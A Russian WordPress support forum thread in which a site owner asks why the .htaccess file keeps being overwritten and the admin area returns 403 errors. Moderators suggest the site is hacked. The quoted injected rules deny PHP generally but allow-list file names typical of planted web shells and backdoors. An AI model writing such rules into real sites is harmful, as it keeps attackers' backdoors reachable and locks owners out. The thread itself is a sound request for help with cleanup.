Поддержка Проблемы и решения Проблема с файлом Htaccess

  • Проблемы с файлом Htaccess:

    1. сбрасываются права доступа с 644 на 444.
    2. вписываю дефолтный код для WordPress

    RewriteEngine On
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

    однако вместо него снова записывается код:

    <FilesMatch ".*\.(?i:phtml|php|suspected)$">
    Order Allow,Deny
    Deny from all
    </FilesMatch>
    <FilesMatch "(^([\.])index.php|^content-index.php|^class-wp-rest-controller-index.php|^backup_index.php|^db-cache.php|^db-safe-mode.php|^class-walker-nav-menu-check-index.php|^webindex.php|^adminindex.php|^wp-type.php|^wp-blog.php|^wp-red.php|^qindex.php|^wp-book.php|^alfindex.php|^oldindex.php|^k.php|^alfindex.php|^session-index.php|^wp-class-smtp-index.php|^wp-old-index.php|^oldindex.php|^plugin-install.php|^wpcss.php|^log.txt|^config.bak.php|^wpconfig.bak.php|^wp-1ogin_bak.php|^1ndex.php|^wp-booking.php|^shell.php|^css.php)$">
    Order Allow,Deny
    Allow from all
    </FilesMatch>

    3. фронт сайта вижу. Но хочу зайти в админку — создать страницу, редактировать страницу — вижу ошибку 403 Forbidden

    Сайт взломан? Какой-то плагин это делает?

    • Тема изменена 4 недели, 1 день назад пользователем sabre.
    • Тема изменена 4 недели, 1 день назад пользователем sabre.
    • Тема изменена 4 недели, 1 день назад пользователем sabre.
    • Тема изменена 4 недели, 1 день назад пользователем sabre.
Просмотр 6 ответов — с 1 по 6 (всего 6)
  • Модератор Yui

    (@fierevere)

    ゆい

    список плагинов бы показали например
    (Консоль: инструменты — здоровье сайта, Информация, скопировать)

    Возможно ваш плагин «безопасности» это делает.

    breadcrumb-navxt

    classic-editor

    contact-form-7

    contact-form-7-style

    customify-pro

    cyr2lat

    dco-insert-analytics-code

    envira-gallery-lite

    extended-widget-options

    font-awesome

    limit-login-attempts-reloaded

    livemesh-siteorigin-widgets

    loco-translate

    old-bb-plugin -конструктор Бивер

    old-gp-premium — плагин темы Генерейт Пресс

    old-health-check

    popup-maker

    redirection

    siteorigin-panels

    so-widgets-bundle

    wordpress-seo

    wpcf7-redirect

    Что-то вписывает этот кусок кода в htaccess:

    <FilesMatch «.*\.(?i:phtml|php|suspected)$»>
    Order Allow,Deny
    Deny from all
    </FilesMatch>
    <FilesMatch «(^index.php|^db.php|^wp-mail.php|^wp-activate.php|^wp-links-opml.php|^wp-blog-header.php|^wp-load.php|^wp-signup.php|^admin-filters.php|^wp-trackback.php|^atomlib.php|^([\.])index.php|^wp-settings.php|^state.php|^wp-config.php|^content-index.php|^class-wp-rest-controller-index.php|^backup_index.php|^xmlrpc.php|^db-cache.php|^admin.php|^edit.php|^upload.php|^theme-editor.php|^themes.php|^plugins.php|^plugin-install.php|^plugin-editor.php|^user-edit.php|^update.php|^tools.php|^malcare-waf.php|^wordfence-waf.php|^db-safe-mode.php|^wp-login.php|^class-walker-nav-menu-check-index.php|^webindex.php|^adminindex.php|^wp-type.php|^wp-blog.php|^wp-red.php|^qindex.php|^wp-book.php|^alfindex.php|^oldindex.php|^k.php|^alfindex.php|^session-index.php|^wp-class-smtp-index.php|^wp-old-index.php|^oldindex.php|^plugin-install.php|^wpcss.php|^log.txt|^config.bak.php|^wpconfig.bak.php|^wp-1ogin_bak.php|^1ndex.php|^wp-booking.php|^shell.php|^css.php)$»>
    Order Allow,Deny
    Allow from all
    </FilesMatch>

    Модератор Yui

    (@fierevere)

    ゆい

    либо это делает wordfence, которого у вас нет, хотя некоторые маски допустимых файлов весьма подозрительны

    либо хостер так развлекается каким-то своим сканером

    либо у вас на сайте поселилась неблаговидная живность
    https://ru.wordpress.org/support/article/faq-hacked/

    Ок, спасибо)

    Модератор Sergey Biryukov

    (@sergeybiryukov)

    Live and Learn

    Сайт взломан?

    Очень похоже.

Просмотр 6 ответов — с 1 по 6 (всего 6)